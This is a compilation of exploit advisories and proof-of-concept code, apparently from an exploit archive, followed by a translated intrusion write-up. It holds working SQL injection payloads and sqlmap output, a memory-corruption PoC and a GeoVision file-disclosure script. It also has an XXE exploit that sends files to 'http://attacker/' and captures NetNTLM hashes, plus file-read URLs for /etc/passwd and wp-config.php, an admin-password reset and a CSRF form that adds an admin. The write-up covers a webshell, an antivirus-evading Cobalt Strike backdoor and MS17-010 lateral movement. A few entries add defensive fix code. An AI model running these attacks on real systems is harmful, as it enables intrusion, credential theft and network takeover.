    Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (random number) - 9 columns
    Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982#



=========================================================
            
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|   Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi                       |
|            Date: 05.19.2015                                                          |
|   Exploit Daddy: pancaker                                                            |
| Vendor Homepage: http://milw0rm.sourceforge.net/                                     |
|   Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download  |
|         Version: v1.0                                                                |
|       Tested On: Ubuntu 10.04                                                        |
|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
|   SHOUTout: milw0rm &&& your mums pancakes                                           |
| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs}       |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>




### vuln codez  related.php ###
<?
include("include/functions.php");

$related = htmlspecialchars(trim($_GET['program']));               <-- this isnt going to save u

$query = mysql_query("SELECT * FROM `exploits` WHERE `r`='".$related."'");   <- might as well b a straight get request lololol owned
$row = mysql_num_rows($query);
if($row){
?>
<html>
<head>
<title><? echo SiteInfo('site_name');?> - exploits : vulnerabilities : videos : papers : shellcode</title>
..zzz...
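The annotation above is the whole bug: htmlspecialchars() is an HTML-output encoder, not a SQL defence. With its pre-8.1 default flags (ENT_COMPAT) it encodes `&`, `<`, `>` and `"` but leaves `'` untouched, so a single-quoted WHERE clause is still terminated by the payload. The Python below is an added example, not code from the advisory or the milw0rm clone: it reproduces the faulty construction against an in-memory SQLite table standing in for `exploits`, next to the parameterised query that fixes it. Table rows and the tautology payload are constructed for the demo (SQLite has no SLEEP(), so a boolean payload stands in for the time-based one). PHP 8.1 changed the default flags to include ENT_QUOTES, which would mangle this exact payload, but quoteless injection into numeric or ORDER BY contexts still works; parameterisation is the fix at either version.

```python
import html
import sqlite3

# Constructed stand-in for the script's `exploits` table (id, r = related program, title).
SAMPLE_ROWS = [
    ("1", "hak5", "usb switchblade"),
    ("2", "hak5", "jasager"),
    ("3", "milw0rm", "some other exploit"),
]


def php_htmlspecialchars(value):
    """Approximates PHP htmlspecialchars() with its pre-8.1 default flags (ENT_COMPAT):
    &, <, > and the double quote become entities, the single quote passes through.
    That is exactly why it does nothing for a query delimited with single quotes."""
    return html.escape(value, quote=False).replace('"', "&quot;")


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE exploits (id TEXT, r TEXT, title TEXT)")
    con.executemany("INSERT INTO exploits VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con


def related_vulnerable(con, program):
    """Mirrors related.php: HTML-encode, trim, then splice the value into the SQL text."""
    related = php_htmlspecialchars(program.strip())
    sql = "SELECT * FROM `exploits` WHERE `r`='" + related + "'"
    return con.execute(sql).fetchall()


def related_fixed(con, program):
    """Parameterised query: the value travels separately from the SQL text, so it can
    never close the string literal and no quote encoding is needed at all."""
    return con.execute("SELECT * FROM exploits WHERE r = ?", (program.strip(),)).fetchall()


# SQLite has no SLEEP(), so a boolean tautology stands in for the SLEEP() payload above.
PAYLOAD = "hak5' OR '1'='1"

if __name__ == "__main__":
    con = make_db()
    print("legit :", related_vulnerable(con, "hak5"))
    print("vuln  :", related_vulnerable(con, PAYLOAD))  # every row comes back
    print("fixed :", related_fixed(con, PAYLOAD))       # nothing matches the literal string
```

The vulnerable function returns the two hak5 rows for a normal lookup and all three rows for the payload; the parameterised version returns nothing for the payload, because the whole string is compared as data.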





### manual ###

root@woop:~# zzz='10'
root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit"
root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz"

real    0m10.008s
user    0m0.004s
sys    0m0.004s






### sqlmap ###

root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-e8f87bf}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:46:53

[09:46:53] [INFO] resuming back-end DBMS 'mysql'
[09:46:53] [INFO] testing connection to the target URL
[09:46:53] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: program (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL#
---
[09:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.12
[09:46:53] [INFO] fetching current user
current user:    'root@localhost'
[09:46:53] [INFO] testing if current user is DBA
[09:46:53] [INFO] fetching current user
[09:46:53] [WARNING] reflective value(s) found and filtering out
current user is DBA:    True
[09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost'





<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|           >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<<          |
|             <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>>            |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

                                   __
___________    ____   ____ _____  |  | __ ___________
\____ \__  \  /    \_/ ___\\__  \ |  |/ // __ \_  __ \
|  |_> > __ \|   |  \  \___ / __ \|    <\  ___/|  | \/
|   __(____  /___|  /\___  >____  /__|_ \\___  >__|
|__|       \/     \/     \/     \/     \/    \/
.........................cant be pr0 without ascii art 
            
#!/usr/bin/python
# libmimedir-free.py
#
# Libmimedir VCF Memory Corruption PoC (CVE-2015-3205)
#
# Jeremy Brown [jbrown3264/gmail]
# June 2015
#
# -Synopsis-
#
# Adding two NULL bytes to the end of a VCF file allows a user to manipulate free() calls
# which occur during its lexer's memory clean-up procedure. This could lead to exploitable
# conditions such as crafting a specific memory chunk to allow for arbitrary code execution.
#
# -Tested-
#
# libmimedir-0.5.1.tar.gz
# libmimedir-static 0.4-13.fc21
#
# -Notes-
#
# Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already
# a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a
# fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch.
#

from struct import pack

def main():
    mime = "begin:vcard<x\nx;type=x;type=x,"
    mime += pack("<Q", 0x4141414141414141) # mdm->p
    mime += pack("<Q", 0x4242424242424242) # mdm->next
    mime += ":x>x.l:x"
    mime += pack("<H", 0x0000) # 2 x YY_END_OF_BUFFER_CHAR
    
    print("Writing free.vcf to local directory...")
    
    try:
        with open("free.vcf", 'wb') as outfile:
            outfile.write(mime)

    except Exception as error:
        print("Error: %s\n" % error)
        return
    
    print("Done\n")
    
    return

if __name__ == "__main__":
    main()
            
# Exploit Title: HP WebInspect - XML External Entity
# Date: 23/04/2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125

1. Create website that exploits vulnerability.

1.1. Website that steals files using OOB technique:
1.1.1. Website that triggers vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.1.2. file.xml file that is served on attacker's host. This file specifies which file should be retrieved from remote host and where content of that file should be sent:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">

<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>">

1.2. Website that steals hashes of Administrator user:
1.2.1. Website that triggers vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.2.2. The attacker runs a tool on that host that captures the incoming SMB authentication attempt (NetNTLM hashes) triggered by the UNC path.

2. The exploit is triggered when the crafted application is profiled or scanned with a vulnerable version of HP WebInspect.
            
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox), Linux (Firefox)
The affected file is f.php; its GET parameter "l" is vulnerable to local file inclusion.
The injected value only needs to be base64 encoded, for example:
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

The request then looks like this:
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and the content of the passwd file is returned.

greets to Black Sniper
Regards T3N38R15
            
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
 Description:
 proxy.php's code:
 <?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Whatever is passed in requrl goes straight to file_get_contents() and the result is echoed
(not included, so it is not executed as PHP). When the two marker strings are absent, strpos()
returns false, which substr() treats as 0, so the entire file is printed. Any remote HTML page
can therefore be fetched through the server, and an attacker may be able to read any local file
the web server user can access; PHP files come back as source rather than being executed.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url "http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd"
            
# Exploit Title: Wordpress History Collection <=1.1.1 Arbitrary File Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux

I-Description:
The WordPress History Collection plugin contains a file called download.php which does not
filter the GET parameter "var"; it then uses that value as the path of the file it forces the
browser to download.
(download.php, line 44):
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );

II-Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php');"

Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH
            
# Exploit Title: Authentication Bypass in Pandora FMS
# Google Dork:
	intitle:"Pandora FMS - The Flexible Monitoring System"
	intitle:"Pandora FMS - el Sistema Flexible de Monitorización"
# Date: 10/06/2015
# Exploit Author: Manuel Mancera (sinkmanu)    |    mmancera (at) a2secure (dot) com
# Vendor Homepage: http://pandorafms.com/
# Software Link: http://pandorafms.com/
# Version: 5.0, 5.1
# Vulnerability Type : Authentication Bypass
# Severity : High


### Description ###

A vulnerability has been discovered in Pandora FMS that permits an unauthenticated user to change the password of any Pandora user without knowing the current password. The flaw is in the login screen: the password-renewal handler changes the password without first checking that a valid session exists.


### Proof of Concept ###

URL: /index.php
Method: POST
Payload: renew_password=1&login=admin
Payload2:
renew_password=1&login=admin&password_new=newpass&password_confirm=newpass


### Exploit ###

curl -d "renew_password=1&login=admin&password_new=newpass&password_confirm=newpass" http://localhost/index.php


### Solution ###

Apply the latest patches available at the vendor website.



####################################################################
Disclaimer
--------------------
All information is provided without warranty. The intent is to provide
information to secure infrastructure and/or systems, not to be able to
attack or damage. Therefore A2Secure shall not be liable for any direct
or indirect damages that might be caused by using this information.

####################################################################
            
# Exploit Title: FiverrScript CSRF Vulnerability (add New admin)
# Author: Mahmoud Gamal (@Zombiehelp54)
# Google Dork: intext:Powered by FiverrScript
# Date: 10/06/2015
# Exploit Author: Scriptolution
# Vendor Homepage: http://scriptolution.com
# Software Link: http://fiverrscript.com
# Version: 7.2
# Tested on: Windows 

FiverrScript is vulnerable to CSRF (no CSRF token is in place): if an admin user can be tricked
into visiting a page crafted by the attacker (via spear phishing or social engineering), a form
is submitted to http://localhost/fiverrscript/administrator/admins_create.php that adds a new
user as administrator.
Once exploited, the attacker can log in to the admin panel
(http://localhost/fiverrscript/administrator/index.php)
with the username and password posted in the form.

CSRF PoC Code
=============

<form action="http://localhost/fiverrscript/administrator/admins_create.php"
method="post" id="main_form" name="main_form"
enctype="multipart/form-data"><input type="hidden" id="submitform"
name="submitform" value="1">
<input type="hidden" name="username" value="attackerUsername">
<input type="hidden" name="password" value="attackerPreferedPW" >
<input type="hidden" name="email" value="attackeremail@something.com">
</form>
<script>
document.forms[0].submit();
</script>
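The missing control is a token bound to the admin's session that is verified on every state-changing POST, so a form submitted from the attacker's page cannot carry a value the attacker could have known. The Python 3 below is an added example, not FiverrScript code: a stateless HMAC synchronizer token, an Origin/Referer check as a second layer, and a hypothetical handler `handle_admins_create` standing in for the processing in admins_create.php. `SECRET_KEY` is generated at import for the demo; a real deployment loads it from configuration, and `trusted_host` is the site's own host name.

```python
import hashlib
import hmac
import os
import secrets
from urllib.parse import urlparse

# Server-side secret; generated here for the demo, kept in configuration in practice.
SECRET_KEY = os.urandom(32)


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session: nonce || HMAC(secret, session_id:nonce).
    Embedding the nonce keeps the server stateless; rendered into the admin form as a hidden field."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    """Recompute the MAC for this session and compare in constant time.
    A token issued to another session, a tampered MAC or a missing field all fail."""
    try:
        nonce, mac = token.split(".", 1)
    except (ValueError, AttributeError):
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def same_origin(headers, trusted_host):
    """Defence in depth: a form auto-submitted from the attacker's page carries the attacker's
    Origin (or Referer). Absence of both is treated as a failure here (strict mode)."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    return urlparse(origin).netloc == trusted_host


def handle_admins_create(session_id, form, headers, trusted_host="localhost"):
    """Hypothetical stand-in for admins_create.php's request handling. Returns (status, message).
    Both checks run before any account is created."""
    if not same_origin(headers, trusted_host):
        return 403, "cross-origin request rejected"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    # ... the original logic would create the administrator here
    return 200, f"admin {form['username']} created"


if __name__ == "__main__":
    sid = "sess-admin-1"
    attack = {"submitform": "1", "username": "attackerUsername", "password": "x", "email": "a@b"}
    print(handle_admins_create(sid, attack, {"Origin": "http://evil.example"}))
    print(handle_admins_create(sid, attack, {"Origin": "http://localhost"}))
    legit = dict(attack, csrf_token=issue_csrf_token(sid))
    print(handle_admins_create(sid, legit, {"Origin": "http://localhost"}))
```

The PoC form above fails twice: once on Origin (the browser sends the attacker's page as origin) and once on the token, which the attacker's page has no way to read because of the same-origin policy. Only a form rendered by the application itself, carrying a token for the admin's own session, reaches the account-creation code.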

Reported to script owner.

Security Level:
================
High
            
#!/usr/bin/python
import os
import sys
import socket
import binascii

'''
Title       : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
CVE-ID      : none
Product     : GeoVision
System		: GeoHttpServer
Affected    : 8.3.3.0 (may be more)
Impact      : Critical
Remote      : Yes
Website link: http://www.geovision.com.tw/
Reported    : 10/06/2015
Author      : Viktor Minin, minin.viktor@gmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No authentication (login) is required to exploit this vulnerability. 
The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser.
'''

# Console cosmetics from the original; they only make sense on Windows.
if os.name == 'nt':
    os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit')
    os.system('color 2')

# The original assigned to setdefaulttimeout instead of calling it, so no timeout was ever set.
socket.setdefaulttimeout(5.0)
CRLF = "\r\n"


def usage():
    print "#######################################################################"
    print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
    print "# Usage: " + sys.argv[0] + " <ip> <port> <file>"
    print "# Example: " + sys.argv[0] + " 127.0.0.1 1337 windows\\win.ini"
    print "#######################################################################"
    sys.exit(1)

try:
    host = sys.argv[1]
    port = int(sys.argv[2])
    target_file = sys.argv[3]      # path relative to the drive root, backslash separated
except (IndexError, ValueError):
    usage()


def recvall(sock):
    # HTTP/1.0 without keep-alive: read until the server closes (or the timeout fires).
    data = ""
    while True:
        try:
            part = sock.recv(4096)
        except socket.timeout:
            break
        if not part:
            break
        data += part
    return data


def request(host, port, pfile):
    # The traversal is the literal "/...\...\" prefix followed by the relative path.
    # Built in one piece so both CRLFs land after "HTTP/1.0"; in the original the "%s"
    # bound only to the last string and placed a CRLF in front of the protocol token.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.send("GET /...\\...\\" + pfile + " HTTP/1.0" + CRLF + CRLF)
    data = recvall(sock)
    sock.close()
    parts = data.split(CRLF + CRLF, 1)
    if len(parts) < 2:
        raise RuntimeError("no header/body separator in response (%d bytes)" % len(data))
    return parts[1]                # body only: the disclosed file


body = request(host, port, target_file)
print body
# Save locally under a name derived from the requested path, e.g. windows_win.ini
out = open(target_file.replace('\\', '_'), "wb")
out.write(body)
out.close()

#~EOF
            
'''
# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability
# Date: 5-6-2015
# Vendor homepage: http://www.chiark.greenend.org.uk
# Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe
# Version: 3.11.0.2
# Author: 3unnym00n

# Details:
# --------
# FileZilla's SFTP module is based on PuTTY's psftp component.
# When doing the old-style SSH DH group exchange, a malformed DH group exchange reply from the server crashes the FileZilla SFTP component.

# Tested On: win7, xp
# Operating steps: run the py, then execute: "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1

'''


import socket
import struct

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()

## do banner exchange
## send server banner
client.send('SSH-2.0-SUCK\r\n')
## recv client banner
client_banner = ''
while True:
    data = client.recv(1)
    if data == '\x0a':
        break
    client_banner += data

print 'the client banner is: %s'%client_banner.__repr__()

## do key exchange
## recv client algorithms
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send server algorithms
client.send('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'.decode('hex'))


## do dh key exchange
## recv dh group exchange request
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange group
client.send('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'.decode('hex'))

## recv dh group exchange init
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)

## send dh group exchange reply
dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
dh_gex_reply_msg += '\x09' ## padding len
dh_gex_reply_msg += '\x21' ## dh gex reply
dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
dh_gex_reply_msg += 'A'*600

client.sendall(dh_gex_reply_msg)
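The reply above declares a host-key string of 0xffff bytes inside a packet that only carries 600, so a client that trusts the inner length field reads far past its buffer. As an added example (not FileZilla or PuTTY code), the Python 3 below parses the RFC 4253 binary packet and the KEX_DH_GEX_REPLY body with every length checked against the bytes actually present, builds a well-formed reply for comparison, and shows the PoC bytes being rejected cleanly instead of crashing. `POC_REPLY` reproduces the bytes sent by the script above; the host key, f and signature in the well-formed reply are constructed placeholders, not real key material.

```python
import struct

SSH_MSG_KEX_DH_GEX_REPLY = 33  # 0x21, RFC 4419 section 3


class MalformedPacket(ValueError):
    """Raised instead of reading past the buffer; the caller should disconnect."""


def read_string(buf, off):
    """RFC 4251 'string' / 'mpint': uint32 length followed by that many bytes.
    The length is validated against what is actually left before slicing."""
    if off + 4 > len(buf):
        raise MalformedPacket("truncated length field at offset %d" % off)
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if n > len(buf) - off:
        raise MalformedPacket("string length %d exceeds %d remaining bytes" % (n, len(buf) - off))
    return buf[off:off + n], off + n


def parse_binary_packet(data):
    """RFC 4253 section 6, unencrypted: uint32 packet_length, byte padding_length, payload, padding.
    Returns (payload, bytes after this packet)."""
    if len(data) < 5:
        raise MalformedPacket("need at least 5 bytes")
    (packet_length,) = struct.unpack_from(">I", data, 0)
    padding_length = data[4]
    if packet_length > len(data) - 4:
        raise MalformedPacket("packet_length %d exceeds %d available" % (packet_length, len(data) - 4))
    if padding_length < 4 or padding_length + 1 >= packet_length:
        raise MalformedPacket("padding_length %d inconsistent with packet_length %d" % (padding_length, packet_length))
    if (packet_length + 4) % 8:
        raise MalformedPacket("packet is not a multiple of the 8-byte block size")
    payload_len = packet_length - padding_length - 1
    return data[5:5 + payload_len], data[4 + packet_length:]


def parse_dh_gex_reply(payload):
    """SSH_MSG_KEX_DH_GEX_REPLY: byte 33, string K_S (host key), mpint f, string signature of H."""
    if not payload or payload[0] != SSH_MSG_KEX_DH_GEX_REPLY:
        raise MalformedPacket("not a KEX_DH_GEX_REPLY")
    off = 1
    host_key, off = read_string(payload, off)
    f, off = read_string(payload, off)
    signature, off = read_string(payload, off)
    if off != len(payload):
        raise MalformedPacket("%d trailing bytes in payload" % (len(payload) - off))
    return {"host_key": host_key, "f": f, "signature": signature}


def build_string(b):
    return struct.pack(">I", len(b)) + b


def build_binary_packet(payload):
    """Pad to the 8-byte block size with at least 4 bytes of padding (RFC 4253 section 6)."""
    padding_length = 8 - ((5 + len(payload)) % 8)
    if padding_length < 4:
        padding_length += 8
    packet_length = 1 + len(payload) + padding_length
    return struct.pack(">IB", packet_length, padding_length) + payload + b"\x00" * padding_length


def build_dh_gex_reply(host_key, f, signature):
    body = bytes([SSH_MSG_KEX_DH_GEX_REPLY]) + build_string(host_key) + build_string(f) + build_string(signature)
    return build_binary_packet(body)


# Bytes reproduced from the PoC above: packet_length 0x23c, padding 9, type 0x21,
# then a host-key length of 0xffff that no 600-byte body can satisfy.
POC_REPLY = b"\x00\x00\x02\x3c" + b"\x09" + b"\x21" + b"\x00\x00\xff\xff" + b"A" * 600


def check(data):
    """Return the parsed reply, or the MalformedPacket message a hardened client would log."""
    try:
        payload, _rest = parse_binary_packet(data)
        return parse_dh_gex_reply(payload)
    except MalformedPacket as e:
        return str(e)


if __name__ == "__main__":
    print(check(build_dh_gex_reply(b"hostkey-blob", b"\x01\x02\x03", b"sig-blob")))
    print(check(POC_REPLY))
```

Note that the outer framing of the PoC is internally consistent (572 bytes declared, 576 with the length field, a multiple of 8) and only the inner string length is impossible; 34 of the 600 trailing bytes actually fall outside the declared packet and would be read as the start of the next one. Checking each nested length against the remaining bytes, not against the declared total, is what turns a crash into a protocol error.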
            

0x01 Finding the injection point

The story starts with me being bored at work and slacking off.

While poking around, I came across the search box of a certain website.

Then, old habit, I typed in a query.

Next I entered 1'

Tsk tsk, this is obviously SQL injection.

Out came the sqlmap artifact without hesitation.

A perfect ending: not only injectable, but the database user has DBA privileges as well.

0x02 Getting a shell on the website

There are a few common ways to get a shell from SQL injection. One is to dump data, find the site's admin backend with a directory scan, log in and find a file upload to get a shell through; the other is to learn the site's absolute path from an error message, a phpinfo page, a 404 page or the like and write a file straight to disk. For MySQL, though, the conditions for the second route are still fairly demanding.

So I took out Yujian and started scanning the site's directories.

I clicked admin on a whim.

I went in, and there was in fact directory listing.

Then I clicked 00/

I nearly coughed up blood. Was it over before it had even started?

The absolute path came uninvited, and it was the most common path at that. Had I known, I would have just run --os-shell against the common paths straight away.

So, with tears in my eyes, I fed the absolute path directly to sqlmap --os-shell

One point worth understanding here: for a MySQL back end, sqlmap's --os-shell first writes a file-upload stager tmpXXXX.php, uses that stager to upload a command-execution shell tmpXXXX.php, and then runs commands through the latter.

For details, see Yujiujiu's blog:

https://www.cnblogs.com/rain99-/p/13755496.html

So here I used the upload stager written by sqlmap to upload my own shell directly.

There was one more problem here: the AntSword one-liner cannot use the assert function.

In the end I swapped to a different one-liner and got the shell.

Because getting the shell went so smoothly, I never looked closely at the directory listing. While writing this article, though, I went through the listed files carefully and found an unauthenticated upload point. In other words, unauthenticated upload plus directory listing to locate the upload folder would have been enough to get a shell on its own.

0x03 Preliminary information gathering

With a shell in hand, the first step is to gather information.

From the above we can see that the current user is SYSTEM, the server is a Server 2012 box inside an intranet, and ESET NOD32 antivirus is installed.

Next, let's look for live hosts on the intranet.

There are many ways to find live hosts on an intranet: nbtscan, ICMP, ARP scanning, ScanLine and so on. Here, for convenience, I brought the host online in the C2 before doing anything else.

The shellcode went online fully undetected.

Here I used k8gege's Ladon plugin to scan the intranet, mainly because its output is prettier.

Part of the scan results:

We can see that there are many live hosts on the intranet. This web server is not joined to a domain, but the scan results contain telling words such as AD, so I estimate there are at least two domain environments on the intranet. At this point more detailed information gathering is needed, and an intranet topology map should be drawn.

0x04 Lateral movement

Further information gathering. The first wave on the intranet is MS17-010; here I again used k8gege's Ladon.

We can see that there are indeed several machines on the intranet that may be vulnerable to MS17-010. Hitting them one by one is a waste of time here, mainly because of the uncertainty: that web server has antivirus installed, so the rest of the intranet probably has it too. So I targeted the servers that might be domain members.

Then CS starts a socks proxy, MSF goes through the proxy, and the fight begins.

Hanging the proxy off the local Kali VM is also very simple:

sudo vim /etc/proxychains.conf

Insert the IP of the CS host and the port that was opened at the bottom.

Save, and start MSF with proxychains msfconsole.

Then something went wrong when the exploit hit the target: the machine's antivirus must have intercepted the interactive execution. So I found an exploit that loads only a single command at a time and used it to add a user.

Between the last time I looked at this box a month ago and writing this article, I never managed to reproduce 17010 again. Since I had added an account on the target earlier, I logged in to take a look and found that the server had been hit with ransomware by some unknown big-shot hacker.

So the reproduction did not continue, and I did not look at this intranet again afterwards.

Let me talk about the general approach to penetrating a domain environment:

First, determine whether the target machine is in a domain environment. If it is:

First escalate privileges on the compromised host and dump hashes to see whether a domain admin account can be read, or check whether there is a domain admin process, inject into it, then pass-the-hash to take the domain controller and export all hashes in the domain.

If the above does not work, try the common domain privilege escalation bugs such as MS14-068, MS14-025 and CVE-2020-1472.

If that does not work either, scan the domain for web applications or common devices and work step by step toward the domain controller, starting from a device or web vulnerability.

One thing to note: throughout the intranet penetration you must have a clear objective, otherwise a lot of time is wasted. At the same time, keep your thinking flexible and do not cling to a single point.

0x05 Summary

1. Enter 1' in the target site's search and see an SQL error: there may be SQL injection.
2. Save the captured search request from Burp as data.txt and inject with sqlmap -r data.txt; the injection is confirmed and the database user is DBA.
3. Scan the target's directories with the Yujian directory scanner; the admin directory returns HTTP 200.
4. Browse the folders under the admin directory at random; 00/ throws an error, and the error reveals the site's physical path.
5. Write a one-liner webshell with sqlmap's --os-shell.
6. Connect to the one-liner with AntSword. Browsing the directories shows an unauthenticated upload point at /js/jqery_file_upload/; a trojan can be uploaded through it and its path found via the directory listing.
7. From AntSword's virtual terminal, query the IP address, running processes (is there AV?), system information and patch level: ipconfig (192.168.1.34, the target's intranet address), tasklist /svc (EKM.EXE and EGUIPROXY.EXE, ESET NOD32 AV), systeminfo.
8. Run Cobalt Strike on the VPS, generate a PowerShell backdoor and make it AV-evasive (PowerShell-based evasion is recommended). Upload the PS script to the target server through AntSword and run it; the host comes online.
9. Upload Ladon.exe through CS and scan system versions with Ladon 192.168.1.0/24 OsScan.
10. Also scan for EternalBlue with Ladon 192.168.1.0/24 MS17-010; several hosts are found.
